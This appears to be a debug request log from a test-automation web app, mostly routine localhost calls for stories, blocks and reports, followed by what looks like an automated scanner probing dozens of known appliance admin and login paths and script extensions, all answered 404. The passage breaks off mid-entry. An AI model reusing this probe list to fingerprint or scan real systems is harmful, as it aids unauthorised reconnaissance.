+2022-10-31T14:02:19.649Z debug: [1667224939634, duration: 14] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:02:22.107Z debug: [1667224942103, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:02:22.126Z debug: [1667224942124, duration: 1] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:02:45.689Z debug: [1667224965641, duration: 47] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T14:03:08.340Z debug: [1667224988336, duration: 4] POST:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T14:03:08.363Z debug: [1667224988360, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T14:03:08.399Z debug: [1667224988396, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:03:08.419Z debug: [1667224988416, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:03:21.741Z debug: [1667225001731, duration: 10] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:03:27.606Z debug: [1667225007597, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:05:17.928Z debug: [1667225114102, duration: 3826] GET:/report/reporting_1667209852374, reqOrigin: ::1, resCode: 200 +2022-10-31T14:10:12.476Z debug: [1667225412472, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:10:12.495Z debug: [1667225412492, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:10:14.099Z debug: [1667225414084, duration: 15] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:10:16.893Z debug: [1667225416882, duration: 8] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:10:16.914Z debug: [1667225416909, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:34.461Z debug: [1667225674458, duration: 3] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T14:14:34.489Z debug: [1667225674483, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:34.502Z debug: [1667225674493, duration: 9] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:34.527Z debug: [1667225674522, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:34.533Z debug: [1667225674523, duration: 9] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:34.557Z debug: [1667225674482, duration: 73] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T14:14:34.620Z debug: [1667225674572, duration: 48] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:38.394Z debug: [1667225678391, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:38.409Z debug: [1667225678407, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:40.144Z debug: [1667225680130, duration: 13] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:44.308Z debug: [1667225684305, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:14:44.321Z debug: [1667225684319, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:20:02.887Z debug: [1667226002876, duration: 10] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:20:05.874Z debug: [1667226005869, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:20:05.895Z debug: [1667226005891, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:21:01.567Z debug: [1667226061556, duration: 11] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 200 +2022-10-31T14:21:17.521Z debug: [1667226074408, duration: 3112] GET:/report/reporting_1667223121646, reqOrigin: ::1, resCode: 200 +2022-10-31T14:22:34.582Z debug: [1667226154555, duration: 23] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:22:37.796Z debug: [1667226157792, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:22:37.814Z debug: [1667226157812, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:26:16.505Z debug: [1667226376497, duration: 8] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:26:19.172Z debug: [1667226379169, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:26:19.189Z debug: [1667226379187, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:28:58.325Z debug: [1667226538314, duration: 10] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:29:02.131Z debug: [1667226542124, duration: 5] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:29:02.210Z debug: [1667226542161, duration: 8] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:29:39.689Z debug: [1667226579681, duration: 8] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:29:42.559Z debug: [1667226582555, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:29:42.578Z debug: [1667226582575, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:08.660Z debug: [1667226608651, duration: 9] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:10.869Z debug: [1667226610866, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:10.890Z debug: [1667226610887, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:39.995Z debug: [1667226639983, duration: 10] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:42.696Z debug: [1667226642691, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:42.718Z debug: [1667226642715, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:44.403Z debug: [1667226644394, duration: 8] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:47.663Z debug: [1667226647659, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:30:47.681Z debug: [1667226647678, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:21.792Z debug: [1667226681754, duration: 34] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:23.786Z debug: [1667226683777, duration: 6] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:23.806Z debug: [1667226683803, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:25.531Z debug: [1667226685520, duration: 10] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:27.821Z debug: [1667226687811, duration: 5] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:27.848Z debug: [1667226687843, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:33.356Z debug: [1667226693348, duration: 8] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:36.410Z debug: [1667226696407, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:36.429Z debug: [1667226696427, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:39.593Z debug: [1667226699578, duration: 13] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:44.421Z debug: [1667226704418, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:44.441Z debug: [1667226704437, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:46.990Z debug: [1667226706976, duration: 13] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:48.776Z debug: [1667226708774, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:48.796Z debug: [1667226708792, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:31:59.803Z debug: [1667226719793, duration: 9] GET:/reportHistory/6357a1da42797f1390c87c70, reqOrigin: ::1, resCode: 200 +2022-10-31T14:32:02.576Z debug: [1667226722574, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:32:02.596Z debug: [1667226722592, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:32:04.568Z debug: [1667226724561, duration: 7] GET:/reportHistory/6357a1da42797f1390c87c70, reqOrigin: ::1, resCode: 304 +2022-10-31T14:32:17.409Z debug: [1667226737406, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:32:17.428Z debug: [1667226737425, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:32:21.112Z debug: [1667226741097, duration: 14] GET:/reportHistory/6357a1da42797f1390c87c70, reqOrigin: ::1, resCode: 304 +2022-10-31T14:32:23.126Z debug: [1667226743123, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:32:23.144Z debug: [1667226743142, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:40:14.329Z debug: [1667227214317, duration: 11] GET:/reportHistory/6357a1da42797f1390c87c70, reqOrigin: ::1, resCode: 200 +2022-10-31T14:40:26.270Z debug: [1667227226261, duration: 8] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 200 +2022-10-31T14:42:09.027Z debug: [1667227329018, duration: 8] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T14:42:28.111Z debug: [1667227348103, duration: 8] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T14:42:35.755Z debug: [1667227355748, duration: 7] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:43:07.842Z debug: [1667227387840, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:43:07.862Z debug: [1667227387859, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:43:19.147Z debug: [1667227399137, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:43:22.687Z debug: [1667227402685, duration: 1] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:43:22.705Z debug: [1667227402703, duration: 1] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:44:08.856Z debug: [1667227448848, duration: 7] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:45:30.293Z debug: [1667227530290, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:45:30.311Z debug: [1667227530309, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:45:32.430Z debug: [1667227532421, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:45:34.717Z debug: [1667227534714, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:45:34.736Z debug: [1667227534733, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:45:42.753Z debug: [1667227542746, duration: 7] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:45:44.987Z debug: [1667227544985, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:45:45.007Z debug: [1667227545002, duration: 4] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:48:13.559Z debug: [1667227693547, duration: 12] GET:/reportHistory/6357a1e942797f1390c87c71, reqOrigin: ::1, resCode: 200 +2022-10-31T14:48:21.212Z debug: [1667227697507, duration: 3704] GET:/report/reporting_1667225693110, reqOrigin: ::1, resCode: 200 +2022-10-31T14:52:46.108Z debug: [1667227966098, duration: 9] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:52:49.243Z debug: [1667227969240, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:52:49.263Z debug: [1667227969261, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:52:55.829Z debug: [1667227975821, duration: 7] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:52:58.251Z debug: [1667227978248, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:52:58.272Z debug: [1667227978270, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:52:59.156Z debug: [1667227979147, duration: 8] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 304 +2022-10-31T14:53:05.311Z debug: [1667227984979, duration: 332] GET:/report/DAISY-Smoketests1666860416368, reqOrigin: ::1, resCode: 200 +2022-10-31T14:53:10.359Z debug: [1667227990357, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T14:53:10.380Z debug: [1667227990378, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:10:23.325Z debug: [1667232623164, duration: 158] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-31T16:10:23.544Z debug: [1667232623430, duration: 113] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-31T16:10:25.482Z debug: [1667232625477, duration: 5] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:10:25.571Z debug: [1667232625557, duration: 14] GET:/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:10:25.643Z debug: [1667232625563, duration: 79] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-31T16:10:25.811Z debug: [1667232625553, duration: 258] GET:/stories/?repoName=Smoke-Tests&source=db&id=63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:10:28.935Z debug: [1667232628889, duration: 45] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 200 +2022-10-31T16:10:28.958Z debug: [1667232628954, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:10:31.504Z debug: [1667232631190, duration: 313] GET:/reportHistory/6357a20842797f1390c87c74, reqOrigin: ::1, resCode: 200 +2022-10-31T16:10:37.305Z debug: [1667232637302, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:10:37.327Z debug: [1667232637324, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:18:29.830Z debug: [1667233109820, duration: 10] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T16:18:37.389Z debug: [1667233117386, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:18:37.411Z debug: [1667233117408, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:18:39.433Z debug: [1667233119424, duration: 9] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 304 +2022-10-31T16:18:44.894Z debug: [1667233124891, duration: 2] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:18:44.915Z debug: [1667233124912, duration: 3] GET:/getBlocks/63565da342797f1390c87c65, reqOrigin: ::1, resCode: 304 +2022-10-31T16:51:12.651Z debug: [1667235072637, duration: 13] GET:/reportHistory/635688ce42797f1390c87c6b, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:41.057Z debug: [1667255921042, duration: 14] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:42.880Z debug: [1667255922877, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:42.895Z debug: [1667255922893, duration: 1] POST:/api/sdk, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:42.933Z debug: [1667255922929, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:42.942Z debug: [1667255922941, duration: 1] POST:/api/sdk, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:43.722Z debug: [1667255923720, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:43.732Z debug: [1667255923729, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:43.741Z debug: [1667255923739, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:43.745Z debug: [1667255923744, duration: 1] GET:/api/api/hpe-restapi.json, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:50.764Z debug: [1667255930762, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:50.772Z debug: [1667255930771, duration: 0] GET:/api/favicon2.iso, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:50.779Z debug: [1667255930779, duration: 0] GET:/api/favicon.iso, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:50.831Z debug: [1667255930829, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:50.840Z debug: [1667255930838, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:50.873Z debug: [1667255930871, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:50.897Z debug: [1667255930893, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:50.903Z debug: [1667255930902, duration: 1] GET:/api/properties/description.dhtml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:50.911Z debug: [1667255930910, duration: 1] GET:/api/properties/configuration.php?tab=Status, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:50.918Z debug: [1667255930917, duration: 0] GET:/api/header.php?tab=status, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:50.961Z debug: [1667255930959, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:50.967Z debug: [1667255930966, duration: 1] GET:/api/aboutprinter.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:50.974Z debug: [1667255930974, duration: 0] GET:/api/properties/configuration.php?tab=Status, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:51.010Z debug: [1667255931008, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:51.019Z debug: [1667255931015, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:51.041Z debug: [1667255931039, duration: 1] HEAD:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:51.047Z debug: [1667255931046, duration: 1] HEAD:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:51.925Z debug: [1667255931922, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:51.956Z debug: [1667255931954, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:51.964Z debug: [1667255931963, duration: 1] GET:/api/login.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:51.975Z debug: [1667255931974, duration: 0] GET:/api/this_server/all_settings.shtml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:51.987Z debug: [1667255931985, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:51.993Z debug: [1667255931992, duration: 0] GET:/api/authenticate/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.006Z debug: [1667255932003, duration: 1] GET:/api/start.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.015Z debug: [1667255932014, duration: 1] GET:/api/tmui/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.025Z debug: [1667255932024, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.034Z debug: [1667255932033, duration: 1] GET:/api/netmri/config/userAdmin/login.tdf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.045Z debug: [1667255932043, duration: 1] GET:/api/scgi-bin/platform.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.053Z debug: [1667255932052, duration: 1] GET:/api/admin/login.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.472Z debug: [1667255932471, duration: 1] GET:/api/en/main.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.481Z debug: [1667255932480, duration: 1] GET:/api/mgmt/login?dest=%2Fmgmt%2Fgui%3Fp%3Dhome&reason=&username=, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.491Z debug: [1667255932490, duration: 0] GET:/api/dms2/Login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.499Z debug: [1667255932498, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.510Z debug: [1667255932509, duration: 0] GET:/api/home.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.518Z debug: [1667255932517, duration: 0] GET:/api/sws/data/sws_data.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.528Z debug: [1667255932527, duration: 0] GET:/api/wcd/system.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.537Z debug: [1667255932536, duration: 0] GET:/api/js/Device.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.546Z debug: [1667255932545, duration: 1] GET:/api/ptz.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.557Z debug: [1667255932556, duration: 0] GET:/api/admin/login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:52.570Z debug: [1667255932569, duration: 1] GET:/api/loginMsg.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.470Z debug: [1667255934468, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.499Z debug: [1667255934498, duration: 1] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.545Z debug: [1667255934541, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.552Z debug: [1667255934551, duration: 0] GET:/api/Home.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.645Z debug: [1667255934643, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.655Z debug: [1667255934654, duration: 1] GET:/api/check_proxy.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.694Z debug: [1667255934692, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.702Z debug: [1667255934701, duration: 0] GET:/api/admin_ui/mas/ent/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.733Z debug: [1667255934731, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.742Z debug: [1667255934739, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.772Z debug: [1667255934771, duration: 0] GET:/api/intruvert/jsp/admin/Login.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.790Z debug: [1667255934789, duration: 1] GET:/api/commoncgi/servlet/CCGIServlet?ApHost=PDT_InterScan_NT&CGIAlias=PDT_InterScan_NT&File=logout.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.809Z debug: [1667255934808, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.817Z debug: [1667255934816, duration: 1] GET:/api/xmldata?item=All, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.825Z debug: [1667255934824, duration: 0] GET:/api/upnp/BasicDevice.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.833Z debug: [1667255934832, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.864Z debug: [1667255934863, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.871Z debug: [1667255934870, duration: 1] GET:/api/robots.txt, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.882Z debug: [1667255934882, duration: 0] GET:/api/sitemap.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.894Z debug: [1667255934893, duration: 0] GET:/api/.cobalt, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.904Z debug: [1667255934903, duration: 1] GET:/api/admin.back, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.913Z debug: [1667255934912, duration: 0] GET:/api/file, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.920Z debug: [1667255934919, duration: 1] GET:/api/wavemaster.internal, reqOrigin: ::1, resCode: 404 +2022-10-31T22:38:54.931Z debug: [1667255934929, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.934Z debug: [1667255934933, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:54.999Z debug: [1667255934997, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:55.007Z debug: [1667255935005, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:38:57.953Z debug: [1667255937952, duration: 1] GET:/api/MSWSMTP/Common/Authentication/Logon.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:05.071Z debug: [1667255945068, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:08.151Z debug: [1667255948150, duration: 0] GET:/api/6VrC_mDccxFp.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.256Z debug: [1667255948255, duration: 0] GET:/api/6VrC_mDccxFp.cgi, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.263Z debug: [1667255948262, duration: 1] GET:/api/6VrC_mDccxFp.sh, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.266Z debug: [1667255948265, duration: 1] GET:/api/6VrC_mDccxFp.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.270Z debug: [1667255948269, duration: 1] GET:/api/6VrC_mDccxFp.inc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.273Z debug: [1667255948272, duration: 0] GET:/api/6VrC_mDccxFp.shtml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.275Z debug: [1667255948274, duration: 1] GET:/api/6VrC_mDccxFp.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.277Z debug: [1667255948276, duration: 1] GET:/api/6VrC_mDccxFp.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:08.281Z debug: [1667255948280, duration: 0] GET:/api/6VrC_mDccxFp.php3, reqOrigin: 